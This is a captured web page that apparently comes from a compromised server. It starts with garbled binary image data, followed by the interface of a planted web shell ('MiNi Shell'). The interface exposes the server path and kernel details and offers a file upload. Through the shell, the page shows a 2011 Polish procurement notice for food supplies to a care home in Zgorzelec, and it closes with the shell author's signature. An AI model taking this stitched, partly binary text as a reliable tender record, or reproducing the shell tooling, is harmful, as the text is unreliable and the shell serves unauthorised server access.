JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110523/125060-N-2011.html

<p class="kh_header"><b>Zgorzelec: Dostawy artykułów spożywczych do Domu Pomocy Społecznej OSTOJA
w Zgorzelcu.</b><br>
<b>Numer ogłoszenia: 125060 - 2011; data zamieszczenia: 23.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej "Ostoja" , ul. Pułaskiego 11-13, 59-900 Zgorzelec, woj. dolnośląskie, tel. 075 7752580 w. 20, faks 075 7752580.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka samorządowa -Dom Pomocy Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych do Domu Pomocy Społecznej OSTOJA
w Zgorzelcu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawy artykułów żywnościowych takich jak art. spożywcze, produkty przemiału ziarna, skrobi i produktów skrobiowych, owoce, warzywa i podobne produkty jn

makaron 0,5kg	             kg	500,
barszcz biały 0,66g	             Szt.	200,
zupa pieczarkowa 0,46g	Szt.	125,
zupa ogonowa 0,40	Szt.	200,
Cukier 1 kg	kg	800,
herbata granulowana100g	Szt.	350,
kawa zbożowa typu Kujawianka500g	Szt.	90,
kawa zbożowa typu Inka150g	Szt.	12,
kakao 200g	Szt.	15,
suchary 290g	Szt.	50,
krakersy 180g	Szt.	150,
herbatniki 80g	Szt.	500,
biszkopty 138g	Szt.	400,
budyń 60g	Szt.	150,
kisiel 77g	Szt.	150,
ketchup łagodny   500g Szt.	170,
sól kg	             Szt.	150,
zupa gulaszowa 0,53g	Szt.	100,
przyprawa do zup typu Winiary, Kucharek
250g	Szt.	60,
przyprawa do zup w płynie 1l	Szt.	120,
musztarda 280g	Szt.	90,
ocet spirytusowy 10% 0,5l	Szt.	10,
cynamon 20g	             Szt.	25,
cukier waniliowy 32g	Szt.	125,
kwasek cytrynowy 20g	Szt.	350,
liść laurowy 10g	             Op.	125,
majeranek 10g	             Op.	300,
papryka słodka  20g	Op.	300,
pieprz naturalny 20g	Op.	350,
pieprz ziołowy 20g	Op.	175,
proszek do pieczenia 36g	Op.	30,
soda oczyszczona 40g	Op.	15,
ziele angielskie 20g 	Op.	125,
bazylia 10g	             Op.	75,
przyprawa prowansalska 10g	Op.	50,
tymianek 10g	             Op.	75,
żelatyna 20g	             Op.	60,
przyprawa piernikowa 20g	Op.	10,
majonez 400ml	            Szt.	100,
zupa cebulowa 31g	             Szt.	50,
miód  naturalny 380g	Szt.	12,
wiórki kokosowe 100g	Szt.	50,
przyprawa oregano 10g	Szt.	75,
herbata ekspresowa czarna 100 saszetek	Szt.	6,
papryka ostra 20g   	Szt.	20,
mąka poznańska 1kg	kg	100,
mąka tortowa 1kg	             kg	275,
mąka ziemniaczana 0,5kg	kg	25,
kasza gryczana 0,5kg	kg	125,
kasza jęczmienna  1kg	kg	250,
kasza manna błyskawiczna 0,5kg	kg	125,
ryż 1kg	                          kg	275,
płatki owsiane 0, 5  kg	 kg	100,
płatki jęczmienne 0,4kg	kg	75,
płatki kukurydziane 250g/500g	kg	15,
cukier puder 0,5 kg 	kg	20,
kasza kukurydziana 0,5kg	kg	75,
aromat do ciast 6ml	Szt.	30,
galaretka owocowa 75g	Szt.	30,
fasolka szparagowa konserwowa 500g	Szt.	200,
kukurydza konserwowa 400g	Szt.	75,
groszek konserwowy 400g	Szt.	200,
chrzan konserwowy 320g	Szt.	60,
koncentrat pomidorowy 0,870g	Szt.	60,
koncentrat pomidorowy 0,165g	Szt.	75,
powidła 320g	                         Szt.	50,
dżem truskawka, wiśnia, leśne 280g	Szt.	350,
marmolada owocowa 500g	             Szt.	20,
syrop wieloowocowy słodzony cukrem 430g	Szt.	900,
Pieczarka konserwowa 800 ml 760g	Szt.	40,
Ananas w puszce 565g	             Szt.	25,
Brzoskwinia w puszce 0,820 kg	Szt.	50,
Ogórek konserwowy 0,9l	             Szt.	400,
Kompot truskawka, wiśnia 0,9l	Szt.	600,
Papryka konserwowa 0,9l	             Szt.	125,
Szczaw konserwowy 0,290 kg	Szt.	125,
Rodzynki 200g	                          kg	1,
Sos pieczarkowy 34g	            Szt.	50,
Sos myśliwski 33g                          Szt.	50,
Sos pomidorowy38g	           Szt.	30,
Zupa Żurek 0,49g	                        Szt.	100,
Pomidory w puszcze bez skórki 900g	Szt.	50,
Koncentrat barszczu 0,30ml	Szt.	50,
Ocet winny 0,5l	Szt.	10,
Przecier ogórkowy 0,25l	Szt.	60,
Przyprawa do ryb 20g	Szt.	30,
Woda mineralna nie gazowana 0,5l	Szt.	125,
Fasola Jaś 0,5kg	kg	60,
Fasola drobna 0,5kg op.	kg	40,
Groch łuskany 0,5kg op.	kg	50,
Cukierki typu Kukułki 	kg	1,
Cukierki typu Raczki	kg	1,
Cukierki jogurtowe 	kg	1,
Cukierki mini	kg	1,
Figurka czekoladowa Mikołaj 60g	Szt.	100,
Fasola konserwowa biała lub czerwona 400g	Szt.	100,
Chrupki kukurydziane 70g	Szt.	1200,
Sok karton 100% pomarańcza, jabłko, czarna porzeczka, grejpfrut	l	20,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.30.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie żąda wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia powyższego wymogu należy dołączyć do oferty : wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw - realizowanych w zakresie przedmiotu niniejszego postępowania w okresie ostatnich trzech lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu (np. min. jedna referencja) potwierdzającego, że te dostawy zostały wykonane lub są wykonywane należycie. Należy wykazać realizacje przynajmniej jednej dostawy. Wartość zrealizowanych (realizowanych) dostaw powinna odpowiadać minimum ? wartości oferty składanej przez Wykonawcę zamówienia Zamawiający na podstawie złożonych dokumentów oceni czy wykonawca spełnia warunki przedstawione powyżej metoda warunku granicznego: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.) Wypełniony formularz oferty- załącznik nr 2 do SIWZ 2.) Wypełniony formularz cenowy- załącznik nr 3 do SIWZ 3.) Pełnomocnictwo lub upoważnienie osób podpisujących ofertę, o ile nie wynika ono z innych ustaw lub dokumentów dołączonych do oferty. W celu zawarcia przyszłej umowy z potencjalnym Wykonawcą Zamawiający wymaga przedłożenia  24 godziny przed podpisaniem umowy na podst.art.36 ust.1 pkt 14 ustawy Pzp: 1.) Umowy spółki cywilnej- wraz z wszystkimi aneksami, jeżeli działalność gospodarcza jest prowadzona w formie spółki cywilnej,, 2.) Aktualnego zaświadczenia o wpisie do ewidencji gospodarczej ( aktualny odpis lub zaświadczenie stanowi dokument wystawiony nie wcześniej niż 6 miesięcy przed terminem składania ofert)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony umowy zastrzegają sobie prawo do wprowadzenia zmian umowy w formie aneksu- w przypadkach j/n 1.Zmiana danych kontrahenta ( nazwy, siedziby, nr ewidencyjnego NIP, REGON, formy prawnej) 2.Strony dopuszczają możliwość przedłużenia czasu obowiązywania umowy- w przypadku niezrealizowania wartości umowy w czasie jej trwania na okres nie dłuższy niż 6 miesięcy ( ceny asortymentu przedłużonej umowy nie mogą się różnić od ujętych w umowie) 3.Strony dopuszczają możliwość zmiany cen w przypadku zmiany stawki podatku VAT 4.Strony dopuszczają zmiany sposobu spełnienia świadczeń ( np. miejsca realizacji umowy, terminów realizacji poszczególnych zamówień)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.zgorzelec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej OSTOJA
ul. Pułaskiego11-13
59-900 Zgorzelec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2011 godzina 10:00, miejsce: Dom Pomocy Społecznej OSTOJA
ul. Pułaskiego11-13
59-900 Zgorzelec
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com